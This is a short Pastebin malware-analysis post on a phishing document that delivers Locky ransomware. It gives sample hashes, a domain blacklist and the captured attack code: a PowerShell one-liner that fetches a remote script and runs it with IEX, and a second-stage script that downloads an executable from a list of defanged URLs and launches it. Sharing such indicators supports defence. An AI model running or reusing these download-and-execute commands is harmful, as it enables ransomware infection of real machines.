Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Initial Payload:
- 4467239f46d04d20df5a6ce0195c457ba3a21bc2fa48d5d82ed13f8e8bca3305
- Type: base64 encoded doc file attached to phishing email
- Action: powershell.exe -nop -noexit -c "$sr = (new-object System.IO.StreamReader ((([System.Net.WebRequest]::Create('http://nikom[.]be/kjh765e46')).GetResponse()).GetResponseStream())).ReadToEnd();IEX $sr;"
- Response:
- $urls = "http://internet-webshops[.]de/O77enbdGF5","http://ist-profy[.]ru/O77enbdGF5","http://lvps212-67-205-60[.]vps[.]webfusion[.]co[.]uk/O77enbdGF5","http://matternomatter[.]com/O77enbdGF5","http://m[.]monteschiavo[.]com/O77enbdGF5","http://minascriptandart[.]nl/O77enbdGF5","http://hilaryandsavio[.]com/O77enbdGF5","http://verwadirephen[.]info/p66/O77enbdGF5"
- $urls = $urls | Sort-Object {Get-Random}
- foreach($url in $urls) {
- Try {
- Write-Host $url
- $f = "D:\MALWARE\171102\envbit32.exe"
- Write-Host $f
- (New-Object System.Net.WebClient).DownloadFile($url, $f)
- Start-Process $f
- break
- } Catch {
- }
- }
- Stage 2 Payloads:
- 0610dae1ee563513ec9bab3ae13b0eb2ee509a791f79b6b8bbf91fd46aaca2c4
- 0f9ca5c555ddf4b5b29573ea1a513a69555afcfd0b1d3fa8f441bc6991bce543
- Type: binary executable
- Action: Ransomware infection (Locky)
- Blacklist:
- nikom[.]be
- internet-webshops[.]de
- ist-profy[.]ru
- lvps212-67-205-60[.]vps[.]webfusion[.]co[.]uk
- matternomatter[.]com
- m[.]monteschiavo[.]com
- minascriptandart[.]nl
- hilaryandsavio[.]com
- verwadirephen[.]info
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement